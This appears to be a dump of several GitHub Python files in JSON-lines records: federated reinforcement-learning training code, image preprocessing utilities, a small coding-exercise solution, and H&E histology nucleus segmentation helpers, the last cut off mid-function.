not gp.PARALLEL_EXICUSION:\n T, done = 0, True\n while T < args.evaluation_size:\n if done:\n done = env.reset()\n state, action, action_logp, avail, reward, done, _ = env.step()\n for index, ele in enumerate(state):\n neighbor_indice = env.environment.coop_graph.neighbor_indices(index, True)\n action_patch = np.append(action, [-1])\n val_mem_aps[index].append(ele, action[index], action_logp[index], action_patch[neighbor_indice],\n action, avail[index], reward[index], done)\n T += 1\nelse:\n num_cores = min(multiprocessing.cpu_count(), gp.ALLOCATED_CORES) - 1\n num_eps = math.ceil(args.evaluation_size / num_cores)\n # make sure each subprocess can finish all the game (end with done)\n with multiprocessing.Manager() as manager:\n train_history_aps = manager.list()\n\n process_list = []\n for _ in range(num_cores):\n process = multiprocessing.Process(target=run_game_once_parallel_random,\n args=(cp.deepcopy(env), train_history_aps, num_eps))\n process_list.append(process)\n\n for pro in process_list:\n pro.start()\n for pro in process_list:\n pro.join()\n pro.terminate()\n\n for res in train_history_aps:\n for index, memerys in enumerate(res):\n for state, a, alog, na, ga, av, rw, done in memerys:\n val_mem_aps[index].append(state, a, alog, na, ga, av, rw, done)\n\nif args.evaluate:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN (online network) to evaluation mode\n (avg_pack) = test(args, 0, dqn, val_mem_aps, matric, results_dir, evaluate=True) # Test\n for index in range(env.environment.ap_number):\n print('Avg. reward for ap' + str(index) + ': ' + str(avg_pack[0][index]) + ' | Avg. Q: ' + str(avg_pack[1][index]))\nelse:\n # Training loop\n T, aps_state, epsilon, done = 0, None, args.epsilon_max, env.reset()\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n for T in trange(1, args.T_max + 1):\n if done and T > 2:\n done = env.reset()\n if T > 1 and args.data_reinforce:\n for index, ap_rein in enumerate(reinforce_ap):\n for ap_pair in ap_rein:\n for ap_ele in ap_pair:\n mem_aps[index].append(ap_ele[0], ap_ele[1], ap_ele[2], ap_ele[3],\n ap_ele[4], ap_ele[5], ap_ele[6], ap_ele[7])\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n # training loop\n if T % args.replay_frequency == 0:\n for _ in range(env.environment.ap_number):\n dqn[_].reset_noise()\n\n state, action, action_logp, avail, reward, done, _ = env.step(dqn)\n epsilon = epsilon - args.epsilon_delta\n epsilon = np.clip(epsilon, a_min=args.epsilon_min, a_max=args.epsilon_max)\n\n for _ in range(env.environment.ap_number):\n if args.reward_clip > 0:\n reward[_] = torch.clamp(reward[_], max=args.reward_clip, min=-args.reward_clip) # Clip rewards\n neighbor_indice = env.environment.coop_graph.neighbor_indices(_, True)\n action_patch = np.append(action, [-1])\n mem_aps[_].append(state[_], action[_], action_logp[_], action_patch[neighbor_indice],\n action, avail[_], reward[_], done)\n dqn[_].update_neighbor_indice(neighbor_indice)\n # Append transition to memory\n if args.data_reinforce:\n # data reinforcement, not applicapable with infinite environment\n obs = state[_]\n obs = torch.rot90(obs, 2, [1, 2])\n if action[_] != 12 and not reward[_] == 0:\n reinforce_ap[_][0].append((obs, env.rot_action(action[_]), action_logp[_],\n env.rot_action(action_patch[neighbor_indice]),\n env.rot_action(action), env.rot_avail(avail[_]), reward[_], done))\n reinforce_ap[_][1].append((torch.flip(obs, [1]), env.flip_action(env.rot_action(action))[_],\n action_logp[_],\n env.flip_action(env.rot_action(action_patch[neighbor_indice])),\n env.flip_action(env.rot_action(action)),\n env.flip_avail(env.rot_avail(avail[_])), reward[_], done))\n reinforce_ap[_][2].append((torch.flip(state[_], [1]), env.flip_action(action)[_], action_logp[_],\n env.flip_action(action_patch[neighbor_indice]),\n env.flip_action(action), env.flip_avail(avail[_]), reward[_], done))\n # append rotated observation for data reinforcement\n\n if T >= args.learn_start:\n # tracker.print_diff()\n for index in range(env.environment.ap_number):\n mem_aps[index].priority_weight = min(mem_aps[index].priority_weight + priority_weight_increase, 1)\n # Anneal importance sampling weight β to 1\n\n if T % args.replay_frequency == 0:\n for index in range(env.environment.ap_number):\n dqn[index].learn(mem_aps[index]) # Train with n-step distributional double-Q learning\n\n if 0 < args.federated_round and T % args.federated_round == 0:\n global_weight = average_weights([model.get_state_dict() for model in dqn])\n global_target = average_weights([model.get_target_dict() for model in dqn])\n global_model.set_state_dict(global_weight)\n # global_model.set_target_dict(global_target)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Global averaging starts')\n average_reward = np.array([model.average_reward for model in dqn])\n average_reward = np.mean(average_reward)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Averaged reward is: ' + str(float(average_reward)))\n for models in dqn:\n models.set_state_dict(global_weight)\n # models.set_target_dict(global_target)\n models.average_reward = average_reward\n\n # If memory path provided, save it\n for index in range(env.environment.ap_number):\n if args.memory is not None:\n save_memory(mem_aps[index], args.memory, args.disable_bzip_memory, index)\n\n # Update target network\n # if T % args.target_update == 0: # uncomment for hard update\n for index in range(env.environment.ap_number):\n dqn[index].soft_update_target_net(1/args.target_update)\n\n # Checkpoint the network\n if (args.checkpoint_interval != 0) and (T % args.checkpoint_interval == 0):\n for index in range(env.environment.ap_number):\n dqn[index].save(results_dir, 'checkpoint' + str(index) + '.pth')\n\n if T % args.evaluation_interval == 0 and T >= args.learn_start:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN (online network) to evaluation mode\n\n if gp.PARALLEL_EXICUSION:\n aps_pack = test_p(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n else:\n aps_pack = test(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n\n log('T = ' + str(T) + ' / ' + str(aps_pack[3]) + ' Shapped Summed Reward.')\n if aps_pack[2]:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Better model, accepted.')\n global_model.save(results_dir, 'Global_')\n # for ind, mod in enumerate(dqn):\n # mod.save(results_dir, ind)\n else:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Worse model, reject.')\n for index in range(env.environment.ap_number):\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' For ap' + str(index) +\n ' | Avg. reward: ' + str(aps_pack[0][index]) + ' | Avg. Q: ' + str(aps_pack[1][index])\n + ' | Avg. R: ' + str(float(dqn[index].average_reward)))\n\n for index in range(env.environment.ap_number):\n dqn[index].train() # Set DQN (online network) back to training mode\n\nenv.close()\n","repo_name":"paperflight/Fed-MF-MAL","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":20641,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"71377157448","text":"import pandas as pd\nfrom preprocessing import Preprocessor\n\ndf = pd.read_csv(\"../feature-engineering/all_mun_features/mun_features.csv\")\ndf = df.head(1000)\ndf = df[['mun_vehicles_rate', 'mun_motorcycles_rate']]\n\ntrain, test = train_test_split(df, test_size = 0.2)\n\np = Preprocessor(df)\np.df\np.scale_features_training(['mun_vehicles_rate', 'mun_motorcycles_rate'])\np.df\n\n","repo_name":"dssg/infonavit-public","sub_path":"pipeline_src/preprocessing_tests.py","file_name":"preprocessing_tests.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43550371016","text":"import numpy as np\nimport cv2\n\n\ndef show_img(img, title='example'):\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) # to cv2 bgr\n cv2.imshow(title, img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef read_img(path) -> np.ndarray:\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\ndef letterbox_resize(img, size, show=False):\n '''resize image with unchanged aspect ratio using padding'''\n ih, iw = img.shape[:2]\n h, w = size\n if ih > iw :\n nh = h\n nw = int(h / ih * iw)\n elif ih < iw:\n nw = w\n nh = int(w / iw * ih)\n else:\n nh, nw = h, w\n # resize the image to small side is\n\n img_resize = cv2.resize(img, (nw, nh), interpolation=cv2.INTER_CUBIC)\n new_image = np.empty((size[0], size[1], 3), dtype=np.uint8)\n new_image[...] = (128, 128, 128)\n try:\n if ih < iw:\n new_image[(h - nh) // 2: (h - nh) // 2 + nh, (w - nw) // 2:] = img_resize\n elif ih > iw:\n new_image[(h - nh) // 2:, (w - nw) // 2:(w - nw) // 2 + nw, :] = img_resize\n else:\n new_image = img_resize\n\n\n except Exception as e:\n print(e)\n print(\"image shape:{}, resize shape: {}\".format(img.shape, (nh, nw)))\n\n if show:\n # print(new_image.shape)\n show_img(new_image)\n\n return new_image\n\ndef image_inference_preprocess(img, reshape_size):\n img = letterbox_resize(img, reshape_size, show=False)\n img = np.array(img, dtype=np.float32)\n img /= 255\n img = np.expand_dims(img, axis=0)\n return img\n","repo_name":"cshjarry/rc_net","sub_path":"utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17807259411","text":"import sys\r\n\r\nstring = sys.stdin.readline().rstrip().lower()\r\nchar_dict = {}\r\nmax_char = []\r\n\r\nfor char in string:\r\n char_dict[char] = char_dict.get(char, 0) + 1\r\n \r\nM = max(char_dict.values())\r\n\r\nfor key, value in char_dict.items():\r\n if value == M:\r\n max_char.append(key)\r\n\r\nif len(max_char) == 1:\r\n print(max_char[0].upper())\r\nelse:\r\n print('?')","repo_name":"chae-yoon/algorithm","sub_path":"백준/Bronze/1157. 단어 공부/단어 공부.py","file_name":"단어 공부.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32925538231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 4 17:13:26 2022\n\n@author: user01\n\"\"\"\nimport cv2\nimport numpy as np\nfrom scipy import linalg\nimport numpy as np\nfrom scipy import ndimage as ndi\nimport tensorflow as tf\nfrom skimage import measure, morphology\nfrom scipy.ndimage import binary_fill_holes\nfrom skimage.segmentation import find_boundaries\nfrom gray2color import gray2color\nimport cv2\nimport copy\nfrom gray2color import gray2color\nimport matplotlib.pyplot as plt\n\n# Normalized optical density (OD) matrix M for H and E.\nrgb_from_her = np.array([[0.65, 0.70, 0.29], # H\n [0.07, 0.99, 0.11], # E\n [0.00, 0.00, 0.00]])# R\nrgb_from_her[2, :] = np.cross(rgb_from_her[0, :], rgb_from_her[1, :])\nher_from_rgb = linalg.inv(rgb_from_her)\n\n# lookup tables for bwmorph_thin\nG123_LUT = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,\n 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1,\n 0, 0, 0], dtype=np.bool)\n\nG123P_LUT = np.array([0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0,\n 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0,\n 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1,\n 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0], dtype=np.bool)\n\ndef bwmorph_thin(image, n_iter=None):\n # check parameters\n if n_iter is None:\n n = -1\n elif n_iter <= 0:\n raise ValueError('n_iter must be > 0')\n else:\n n = n_iter\n \n # check that we have a 2d binary image, and convert it\n # to uint8\n skel = np.array(image).astype(np.uint8)\n \n if skel.ndim != 2:\n raise ValueError('2D array required')\n if not np.all(np.in1d(image.flat,(0,1))):\n raise ValueError('Image contains values other than 0 and 1')\n\n # neighborhood mask\n mask = np.array([[ 8, 4, 2],\n [16, 0, 1],\n [32, 64,128]],dtype=np.uint8)\n\n # iterate either 1) indefinitely or 2) up to iteration limit\n while n != 0:\n before = np.sum(skel) # count points before thinning\n \n # for each subiteration\n for lut in [G123_LUT, G123P_LUT]:\n # correlate image with neighborhood mask\n N = ndi.correlate(skel, mask, mode='constant')\n # take deletion decision from this subiteration's LUT\n D = np.take(lut, N)\n # perform deletion\n skel[D] = 0\n \n after = np.sum(skel) # coint points after thinning\n \n if before == after: \n # iteration had no effect: finish\n break\n \n # count down to iteration limit (or endlessly negative)\n n -= 1\n skel = skel.astype(np.bool)\n return skel.astype(np.uint8)\n\ndef deconv_stains(rgb, conv_matrix):\n '''\n Parameters\n ----------\n rgb: a 3-channel RGB iamge with channel dim at axis=-1 e.g. (W,H,3) type: uint8/float32\n conv_matrix: Deconvolution matrix D of shape (3,3); type: float32\n Returns\n -------\n image with doconvolved stains, same dimension as input.\n '''\n # change datatype to float64\n rgb = (rgb).astype(np.float64)\n np.maximum(rgb, 1E-6, out=rgb) # to avoid log artifacts\n log_adjust = np.log(1E-6) # for compensate the sum above\n x = np.log(rgb)\n stains = (x / log_adjust) @ conv_matrix\n\n # normalizing and shifting the data distribution to proper pixel values range (i.e., [0,255])\n h = 1 - (stains[:,:,0]-np.min(stains[:,:,0]))/(np.max(stains[:,:,0])-np.min(stains[:,:,0]))\n e = 1 - (stains[:,:,1]-np.min(stains[:,:,1]))/(np.max(stains[:,:,1])-np.min(stains[:,:,1]))\n r = 1 - (stains[:,:,2]-np.min(stains[:,:,2]))/(np.max(stains[:,:,2])-np.min(stains[:,:,2]))\n\n her = cv2.merge((h,e,r)) * 255\n\n return her.astype(np.uint8)\n\ndef enclose_boundry(sem_mask, instances):\n frame = np.ones(sem_mask.shape)\n frame[2:-2,2:-2] = 0\n # for nuclie who are touching the image boudry\n inst_b = np.multiply(frame, sem_mask)\n inst_b = np.add(instances, inst_b)\n _,inst_b = cv2.threshold(inst_b, 0, 1, cv2.THRESH_BINARY)\n inst_b = inst_b.astype(np.uint8)\n return inst_b\ndef read_img(img_path, modelip_img_w, modelip_img_h):\n \n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n h = deconv_stains(img, her_from_rgb)\n \n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n return img, h\n \ndef Tumor_IO(img_path, sem_mask, inst_mask, modelip_img_w, modelip_img_h):\n '''\n See desdcription of Depth_Data_Generator\n '''\n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n #h = decovn_he(img)\n h = deconv_stains(img, her_from_rgb)\n\n sem = cv2.imread(sem_mask, -1)\n inst = cv2.imread(inst_mask, -1)\n if len(np.unique(sem)) == 1:# b/c only BG is present\n sem = sem * 0\n inst = inst * 0\n # b/c the overlayed boundries might contain pixel value > 1\n _,inst = cv2.threshold(inst, 0, 1, cv2.THRESH_BINARY)\n \n # verify boundries enclosement\n # still we need to enclose boundry to be consistent in test and train time\n inst = enclose_boundry(sem, inst)\n \n if img.shape[0] != modelip_img_w:\n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n # to normalize [0, 255] pixel values to [0, 1]\n # if you are using builtin keras model then dont normalize\n img = img\n h = h \n inst = inst[:,:, np.newaxis]\n sem = sem[:,:, np.newaxis]\n \n return img, sem, inst, h\n\ndef gray2encoded(y_true, num_class):\n '''\n Parameters\n ----------\n y_true : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N] \n num_class : int no. of classes inculding BG\n Returns\n -------\n encoded_op : one-hot encoded 3D array of shape [H W N] where N=num_class\n\n '''\n num_class = num_class\n \n y_true = tf.cast(y_true, 'int32')\n \n encoded_op = tf.one_hot(y_true, num_class, axis = -1)\n \n if tf.executing_eagerly()==False:\n sess1 = tf.compat.v1.Session()\n encoded_op = sess1.run(encoded_op)\n else: \n encoded_op = encoded_op.numpy()\n return encoded_op\n\ndef seprate_instances(sem_mask, instance_boundaries, num_classes, apply_morph=True, kernel_size=3):\n '''\n\n Parameters\n ----------\n sem_mask : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N]\n instance_boundaries : 2D array of shape [H x W] bounderies for all N classes i.e., [0->BG, 1->boundry]\n num_classes : no of classes in the sem mask including BG an int\n apply_morph : apply morphological operator so that the edges which were chipped of will be recovered\n Returns\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n -------\n op : 3D array containing seperated instances in each channel shape [H x W x N]\n\n '''\n \n # change datatypt to perform operation\n instances = instance_boundaries.astype(np.float16)\n sem_mask = sem_mask.astype(np.float16)\n instances2 = instances * 6 # bc largest value in sem mask is 5\n \n t = np.subtract(sem_mask, instances2)\n negative_remover = lambda a: (np.abs(a)+a)/2 # one line funstion created by lamda 1 input and 1 output\n t = negative_remover(t).astype(np.uint8)\n # or you can use following line\n #t = np.where(t > 0, t, 0).astype(np.uint8)\n \n # Now as in PanNuke dataset the BG was in 5ht channel and during preprocessing we shifted it to \n # 0th channel. Now going back so that 0th channel is Neoplastic class and 5th channel is BG as given \n # in original data description.\n \n if len(np.unique(cv2.fastNlMeansDenoising(t))) == 1:# 1st denoising there might be some noise in the op image\n # if only BG is present than only last channel will be one, do it here\n # b/c the np where conditions wont have any effect on the array if it \n # only have one class\n tt = np.zeros((t.shape[0], t.shape[1], num_classes))\n tt[:,:,5] = tt[:,:,-1] + 1\n t = tt\n else:# if have atleast one nuclie present/ swaping channels again to match GT\n t = np.where(t == 5, 6, t)\n t = np.where(t == 0, 5, t)\n t = np.where(t == 6, 0, t)\n \n t = gray2encoded(t, num_classes)\n \n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size,kernel_size))# before i started main_203 it was 2x2\n op = np.zeros(t.shape)\n for i in range(num_classes):\n # Bc at some place boundry is diagonal and very thin (1px) so measure-label\n # will join two seprate blobs so this will seprate them a little\n t[:,:,i] = cv2.erode(t[:,:,i],kernel,iterations = 1)\n # b/c now 5th channel is BG; still 0 digit represents BG in all channels\n # in 5th channel also the BG of the BG*\n op[:,:,i] = measure.label(t[:,:,i], connectivity=2, background=0)# 2 is ususal\n \n if apply_morph == True:\n #kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(10,10))\n #kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_size, kernel_size))\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n for i in range(num_classes-1):# bc last channel has BG we dont want to change that \n op[:,:,i] = cv2.dilate(op[:,:,i],kernel,iterations = 1)\n \n op[:,:,5] = np.where(op[:,:,5]>1, 1, op[:,:,5])\n \n return op\n\n\n\n\ndef remove_small_obj_n_holes(seg_op, min_area=10, kernel_size=3):\n '''\n Parameters\n ----------\n seg_op : a 4D array of N channels [1 H W N] where N is number of classses\n min_area : The smallest allowable object size.\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n Returns\n -------\n a : 4D array of N channels [1 H W N] with noise removed and holes filled\n '''\n seg_op = copy.deepcopy(seg_op).astype(np.uint8)\n #k = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(kernel_size,kernel_size))\n k = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n a = seg_op.squeeze()\n for i in range(a.shape[-1]-1): # iterate over each class seprately\n # need to convert array into boolen type\n b = morphology.remove_small_objects(a[:,:,i+1].astype(bool), min_size=min_area).astype(np.uint8)\n b = cv2.morphologyEx(b, cv2.MORPH_CLOSE, k)\n a[:,:,i+1] = b\n #a[:,:,i+1] = morphology.convex_hull_object(b, connectivity=2)\n #a[:,:,i+1] = binary_fill_holes(b).astype(int)\n a = a[np.newaxis,:,:,:]# keep IO size consistant\n \n return a\n\ndef assgin_via_majority(seg):\n '''\n Parameters\n ----------\n seg : 2D array containing unique pixel values for each class\n Returns\n -------\n x: 2D array where an instance is assigned to be the class of most frequently\n occuring pixel value (as each unique pixel value represent a class).\n '''\n a = copy.deepcopy(seg).astype(np.uint8)\n # 1st convert to binary mask\n _, th = cv2.threshold(a, 0, 1, cv2.THRESH_BINARY)\n # now measure label\n b = measure.label(th, connectivity=2, background=0)\n # now make n unique channels n= no. of labels measured\n c = gray2encoded(b, len(np.unique(b)))\n \n op = np.zeros(c.shape)\n for i in range(len(np.unique(b))-1):\n temp = np.multiply(c[:,:,i+1], a)# multiply each channel element wise\n mfp = most_frequent_pixel(temp)\n # now convert the range form [0, 1] to [0, mfp]\n _, temp = cv2.threshold(temp, 0, mfp, cv2.THRESH_BINARY)\n op[:,:,i+1] = temp\n x = np.sum(op, axis=2)\n \n return x.astype(np.uint8)\n\ndef most_frequent_pixel(img):\n '''\n Parameters\n ----------\n img : 2D array containing unique pixel values for each class\n Returns\n -------\n op : int, most frequently occuring pixel value excluding which has pixel value of 0\n '''\n unq, count = np.unique(img, return_counts=True)\n idx = np.where(count == np.max(count[1:]))\n op = int(unq[idx][0])\n \n return op\n\ndef decode_predictions(seg_op, inst_op, thresh=0.5):\n '''\n Parameters\n ----------\n seg_op : Raw logits from CNN output, shape [B, H, W, N]\n inst_op : Raw logits from CNN output, shape [B, H, W, 1]\n thresh : Threshold on pixel confidence a float between [0, 1]\n Returns\n -------\n seg_op : activated and thresholded output of CNN\n inst_op : activated and thresholded output of CNN\n '''\n seg_op = softmax_activation(seg_op)\n seg_op = (seg_op > thresh).astype(np.uint8)\n seg_op = remove_small_obj_n_holes(seg_op, min_area=22, kernel_size=3)\n seg_op = np.argmax(seg_op[0,:,:,:], 2).astype(np.uint8)\n seg_op = assgin_via_majority(seg_op) # assigning instance via majority pixels ((post processing))\n seg_op = (seg_op).astype(np.uint8)\n \n inst_op = sigmoid_activation(inst_op)\n inst_op = (inst_op > thresh).astype(np.uint8)\n inst_op = inst_op.squeeze()\n inst_op = (inst_op).astype(np.uint8)\n inst_op = bwmorph_thin(inst_op)\n \n return seg_op, inst_op\n\ndef get_inst_seg(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB value \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0) # ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1) \n rgb = gray2color(sep_inst.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, rgb)\n else:\n blend = rgb\n \n return blend\n\ndef get_inst_seg_bdr(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0)# ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1)\n # isolate all instances \n sep_inst_enc = gray2encoded(sep_inst, num_class=len(np.unique(sep_inst)))\n # as the in encoded output the 0th channel will be BG we don't need it so\n sep_inst_enc = sep_inst_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sep_inst_enc.shape)\n for i in range(sep_inst_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sep_inst_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n # bc argmax will make the inst at 0 ch zeros so add a dummy channel\n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sep_inst_bdr = np.argmax(temp, axis=-1)\n sep_inst_bdr_rgb = gray2color(sep_inst_bdr.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst_bdr.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, sep_inst_bdr_rgb)\n else:\n blend = sep_inst_bdr_rgb\n \n return blend\n\ndef get_sem(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB color. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n seg = gray2color(sem.astype(np.uint8), use_pallet='pannuke')\n \n if blend:\n inv = 1 - cv2.threshold(sem.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, seg)\n else:\n blend = seg\n \n return blend\n\ndef get_sem_bdr(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n # 1-hot encode all classes \n sem_enc = gray2encoded(sem, num_class=6)\n # as the in encoded output the 0th channel will be BG we don't need it so\n sem_enc = sem_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sem_enc.shape)\n for i in range(sem_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sem_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sem_bdr = np.argmax(temp, axis=-1)\n sem_bdr_rgb = gray2color(sem_bdr.astype(np.uint8), use_pallet='pannuke')\n if blend:\n inv = 1 - cv2.threshold(sem_bdr.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = 